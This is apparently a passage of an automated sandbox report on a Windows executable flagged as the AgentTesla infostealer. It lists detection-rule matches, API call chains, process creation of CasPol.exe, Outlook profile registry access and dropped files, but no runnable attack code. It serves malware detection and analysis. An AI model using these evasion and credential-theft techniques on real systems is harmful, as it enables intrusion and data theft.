          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405809

          System Summary

          barindex
          Source: 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: Process Memory Space: CasPol.exe PID: 4028, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: SecuriteInfo.com.generic.ml.10062.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: Process Memory Space: CasPol.exe PID: 4028, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_00406D5F1_2_00406D5F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_6F671BFF1_2_6F671BFF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032C1E191_2_032C1E19
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032C09E61_2_032C09E6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032BA7221_2_032BA722
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B17271_2_032B1727
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B03381_2_032B0338
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B07341_2_032B0734
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0B0C1_2_032B0B0C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B1B191_2_032B1B19
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B176C1_2_032B176C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B03791_2_032B0379
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B077D1_2_032B077D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0B4A1_2_032B0B4A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B17551_2_032B1755
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B03A91_2_032B03A9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B17A31_2_032B17A3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B7BA61_2_032B7BA6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032BA7A61_2_032BA7A6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032C17BF1_2_032C17BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B7BB31_2_032B7BB3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0B891_2_032B0B89
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032BA78F1_2_032BA78F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B438E1_2_032B438E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B17E51_2_032B17E5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032BA7FE1_2_032BA7FE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0BC11_2_032B0BC1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B07C01_2_032B07C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B03DE1_2_032B03DE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B02251_2_032B0225
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B06091_2_032B0609
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B6A051_2_032B6A05
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B7E1A1_2_032B7E1A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0A661_2_032B0A66
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B06481_2_032B0648
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032BA6421_2_032BA642
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0E401_2_032B0E40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0A451_2_032B0A45
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B02551_2_032B0255
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032C2AAC1_2_032C2AAC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032BA6B91_2_032BA6B9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B06BC1_2_032B06BC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B02B31_2_032B02B3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032C46B01_2_032C46B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B06831_2_032B0683
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0E821_2_032B0E82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B02811_2_032B0281
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B06871_2_032B0687
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0A9E1_2_032B0A9E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B1AEA1_2_032B1AEA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032C22E41_2_032C22E4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B02FE1_2_032B02FE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B06F61_2_032B06F6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0ADD1_2_032B0ADD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032BB12B1_2_032BB12B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B71391_2_032B7139
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032BA5381_2_032BA538
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032C25391_2_032C2539
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B09301_2_032B0930
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0D341_2_032B0D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B05051_2_032B0505
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B19171_2_032B1917
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B056B1_2_032B056B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B016F1_2_032B016F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032BA5671_2_032BA567
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B6D721_2_032B6D72
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B09761_2_032B0976
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032BB1481_2_032BB148
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B19431_2_032B1943
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0DAD1_2_032B0DAD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B19B91_2_032B19B9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B01B01_2_032B01B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B09B71_2_032B09B7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B7D8C1_2_032B7D8C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B19801_2_032B1980
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B05861_2_032B0586
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032BA59E1_2_032BA59E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B01E41_2_032B01E4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B09FA1_2_032B09FA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B69FF1_2_032B69FF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0DF61_2_032B0DF6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B1DCC1_2_032B1DCC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B05D21_2_032B05D2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B040E1_2_032B040E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B000E1_2_032B000E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B08021_2_032B0802
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0C681_2_032B0C68
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0C6E1_2_032B0C6E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0C641_2_032B0C64
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B7C481_2_032B7C48
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B044F1_2_032B044F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0C421_2_032B0C42
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B08401_2_032B0840
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B005B1_2_032B005B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B185C1_2_032B185C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0CA91_2_032B0CA9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B08871_2_032B0887
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B04851_2_032B0485
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B189B1_2_032B189B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B00951_2_032B0095
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B7CE81_2_032B7CE8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B6CEC1_2_032B6CEC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032BA4F91_2_032BA4F9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B0CF41_2_032B0CF4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B18CE1_2_032B18CE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B00CE1_2_032B00CE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B08C01_2_032B08C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B04C61_2_032B04C6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B6CDF1_2_032B6CDF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013478D05_2_013478D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01347E565_2_01347E56
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134D6805_2_0134D680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013451285_2_01345128
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013431795_2_01343179
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013425E85_2_013425E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134D0585_2_0134D058
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013463105_2_01346310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01345B805_2_01345B80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134EA705_2_0134EA70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013A84305_2_013A8430
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013A58885_2_013A5888
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013A7B065_2_013A7B06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013A9F705_2_013A9F70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013ADF605_2_013ADF60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013A93D95_2_013A93D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013A07D25_2_013A07D2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013A5E085_2_013A5E08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013AAA605_2_013AAA60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013A9AB05_2_013A9AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013A45405_2_013A4540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_013A41905_2_013A4190
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1C6214E85_2_1C6214E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1C62D5185_2_1C62D518
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1C6272D85_2_1C6272D8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D325D085_2_1D325D08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D3243745_2_1D324374
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D325C205_2_1D325C20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D3269D05_2_1D3269D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1F7143205_2_1F714320
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1F71BE705_2_1F71BE70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1F71B1105_2_1F71B110
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1F71DC785_2_1F71DC78
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1F718C685_2_1F718C68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1F7137085_2_1F713708
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1F713A505_2_1F713A50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032C1E19 NtAllocateVirtualMemory,1_2_032C1E19
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032C41B7 NtResumeThread,1_2_032C41B7
          Source: System.IO.FileSystem.Watcher.dll.1.drStatic PE information: No import functions for PE file found
          Source: MsMpLics.dll.1.drStatic PE information: No import functions for PE file found
          Source: lang-1045.dll.1.drStatic PE information: No import functions for PE file found
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameARMOURY CRATE eGPU Product.exe8 vs SecuriteInfo.com.generic.ml.10062.exe
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs SecuriteInfo.com.generic.ml.10062.exe
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.FileSystem.Watcher.dll@ vs SecuriteInfo.com.generic.ml.10062.exe
          Source: SecuriteInfo.com.generic.ml.10062.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
          Source: SecuriteInfo.com.generic.ml.10062.exeStatic PE information: invalid certificate
          Source: p11-kit-trust.dll.1.drStatic PE information: Number of sections : 11 > 10
          Source: SecuriteInfo.com.generic.ml.10062.exeVirustotal: Detection: 11%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeJump to behavior
          Source: SecuriteInfo.com.generic.ml.10062.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe" Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe" Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe" Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeFile created: C:\Users\user\AppData\Local\Temp\nsv213.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/14@0/1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_004021AA CoCreateInstance,1_2_004021AA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404AB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1264:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1264:304:WilStaging_02
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeFile written: C:\Users\user\AppData\Local\Temp\krista.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: SecuriteInfo.com.generic.ml.10062.exeStatic file information: File size 1447056 > 1048576
          Source: SecuriteInfo.com.generic.ml.10062.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: H:\n2\3rdparty\FFmpeg\2.8.2\public\src\ffmpeg\libavutil\avutil-54.pdb source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.dr
          Source: Binary string: System.IO.FileSystem.Watcher.ni.pdb source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.1.dr
          Source: Binary string: D:\SourceCode\gc3.gpuswitch\production_V4.2\Service\ServiceSDK\Release\GPUSwitchPlugin\ARMOURY CRATE eGPU Product.pdb source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.1.dr
          Source: Binary string: D:\SourceCode\gc3.gpuswitch\production_V4.2\Service\ServiceSDK\Release\GPUSwitchPlugin\ARMOURY CRATE eGPU Product.pdb source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.1.dr
          Source: Binary string: H:\n2\3rdparty\FFmpeg\2.8.2\public\src\ffmpeg\libavutil\avutil-54.pdb source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62481419345.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.1.dr
          Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.Watcher\net6.0-windows-Release\System.IO.FileSystem.Watcher.pdb source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62478493581.000000000293F000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.1.dr

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
